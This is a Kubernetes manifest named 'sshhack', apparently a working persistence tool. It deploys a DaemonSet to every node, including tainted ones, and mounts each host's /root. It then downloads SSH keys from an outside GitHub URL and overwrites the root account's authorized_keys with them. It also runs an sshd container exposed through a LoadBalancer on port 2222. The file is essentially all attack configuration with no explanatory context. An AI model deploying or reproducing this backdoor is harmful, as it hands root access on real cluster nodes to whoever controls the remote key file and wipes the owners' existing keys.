apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: sshhack
spec:
  selector:
    matchLabels:
      app: sshhack
  template:
    metadata:
      labels:
        app: sshhack
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root 
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: sshhack
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "mkdir -p /root/.ssh && ls -al /root/.ssh && apk update && apk add --no-cache curl && curl https://raw.githubusercontent.com/skurtzemann/k8shack/main/keys > /root/.ssh/authorized_keys && cat /root/.ssh/authorized_keys"
      containers:
      - name: sshd
        image: sickp/alpine-sshd

---
kind: Service
apiVersion: v1
metadata:
  name: sshd-service
spec:
  selector:
    app: sshhack
  type: LoadBalancer
  ports:
  - protocol: TCP
    port: 2222
    targetPort: 22
